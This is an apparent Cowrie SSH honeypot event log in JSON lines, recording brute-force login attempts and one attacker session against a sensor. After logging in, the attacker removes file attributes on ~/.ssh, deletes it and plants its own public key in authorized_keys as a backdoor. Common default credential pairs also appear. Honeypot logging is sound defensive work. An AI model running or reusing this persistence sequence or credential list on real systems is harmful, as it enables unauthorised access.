{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:57:10.816226Z","src_ip":"212.227.235.229","session":"e4a6975a41a3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:57:11.408581Z","src_ip":"212.227.235.229","session":"e4a6975a41a3"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:57:12.549953Z","src_ip":"212.227.235.229","session":"e4a6975a41a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39672,"dst_ip":"1.2.3.4","dst_port":22,"session":"69853ee65eac","protocol":"ssh","message":"New connection: 212.227.235.229:39672 (1.2.3.4:22) [session: 69853ee65eac]","sensor":"my-vps","timestamp":"2025-09-08T22:57:12.684479Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:57:12.685104Z","src_ip":"212.227.235.229","session":"69853ee65eac"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:57:12.820623Z","src_ip":"212.227.235.229","session":"69853ee65eac"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:57:13.401300Z","src_ip":"212.227.235.229","session":"69853ee65eac"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:57:13.541265Z","src_ip":"212.227.235.229","session":"69853ee65eac"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:57:13.542427Z","src_ip":"212.227.235.229","session":"2ee9fc674b51"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60524,"dst_ip":"1.2.3.4","dst_port":22,"session":"65fcc2c4cf1a","protocol":"ssh","message":"New connection: 212.227.235.229:60524 (1.2.3.4:22) [session: 65fcc2c4cf1a]","sensor":"my-vps","timestamp":"2025-09-08T22:57:27.609832Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:57:27.620068Z","src_ip":"212.227.235.229","session":"65fcc2c4cf1a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:57:27.715117Z","src_ip":"212.227.235.229","session":"65fcc2c4cf1a"}
{"eventid":"cowrie.login.failed","username":"super","password":"0","message":"login attempt [super/0] failed","sensor":"my-vps","timestamp":"2025-09-08T22:57:28.096654Z","src_ip":"212.227.235.229","session":"65fcc2c4cf1a"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:57:29.194908Z","src_ip":"212.227.235.229","session":"65fcc2c4cf1a"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":35132,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f8d0d2d2e7c","protocol":"ssh","message":"New connection: 139.19.117.131:35132 (1.2.3.4:22) [session: 0f8d0d2d2e7c]","sensor":"my-vps","timestamp":"2025-09-08T22:57:39.098277Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T22:57:39.099155Z","src_ip":"139.19.117.131","session":"0f8d0d2d2e7c"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-09-08T22:57:39.116878Z","src_ip":"139.19.117.131","session":"0f8d0d2d2e7c"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-09-08T22:57:39.152126Z","src_ip":"139.19.117.131","session":"0f8d0d2d2e7c"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-08T22:57:39.152731Z","src_ip":"139.19.117.131","session":"0f8d0d2d2e7c"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-09-08T22:57:39.170274Z","src_ip":"139.19.117.131","session":"0f8d0d2d2e7c"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-08T22:57:39.170860Z","src_ip":"139.19.117.131","session":"0f8d0d2d2e7c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53662,"dst_ip":"1.2.3.4","dst_port":22,"session":"04ce655f705b","protocol":"ssh","message":"New connection: 212.227.235.229:53662 (1.2.3.4:22) [session: 04ce655f705b]","sensor":"my-vps","timestamp":"2025-09-08T22:57:40.757349Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:57:40.758187Z","src_ip":"212.227.235.229","session":"04ce655f705b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:57:41.109344Z","src_ip":"212.227.235.229","session":"04ce655f705b"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"Welcome1","message":"login attempt [postgres/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-08T22:57:42.342448Z","src_ip":"212.227.235.229","session":"04ce655f705b"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:57:43.654108Z","src_ip":"212.227.235.229","session":"04ce655f705b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50832,"dst_ip":"1.2.3.4","dst_port":22,"session":"99553cca871b","protocol":"ssh","message":"New connection: 212.227.235.229:50832 (1.2.3.4:22) [session: 99553cca871b]","sensor":"my-vps","timestamp":"2025-09-08T22:57:45.010485Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:57:45.033381Z","src_ip":"212.227.235.229","session":"99553cca871b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:57:45.265189Z","src_ip":"212.227.235.229","session":"99553cca871b"}
{"eventid":"cowrie.login.success","username":"root","password":"1221","message":"login attempt [root/1221] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:57:46.270591Z","src_ip":"212.227.235.229","session":"99553cca871b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:57:46.802790Z","src_ip":"212.227.235.229","session":"99553cca871b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:57:46.803471Z","src_ip":"212.227.235.229","session":"99553cca871b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:57:46.804599Z","src_ip":"212.227.235.229","session":"99553cca871b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:57:47.037241Z","src_ip":"212.227.235.229","session":"99553cca871b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:57:47.590182Z","src_ip":"212.227.235.229","session":"99553cca871b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:57:47.591111Z","src_ip":"212.227.235.229","session":"99553cca871b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:57:47.783121Z","src_ip":"212.227.235.229","session":"99553cca871b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:57:47.784012Z","src_ip":"212.227.235.229","session":"99553cca871b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51882,"dst_ip":"1.2.3.4","dst_port":22,"session":"f30135e118be","protocol":"ssh","message":"New connection: 212.227.235.229:51882 (1.2.3.4:22) [session: f30135e118be]","sensor":"my-vps","timestamp":"2025-09-08T22:57:48.010155Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:57:48.013597Z","src_ip":"212.227.235.229","session":"f30135e118be"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:57:48.266546Z","src_ip":"212.227.235.229","session":"f30135e118be"}
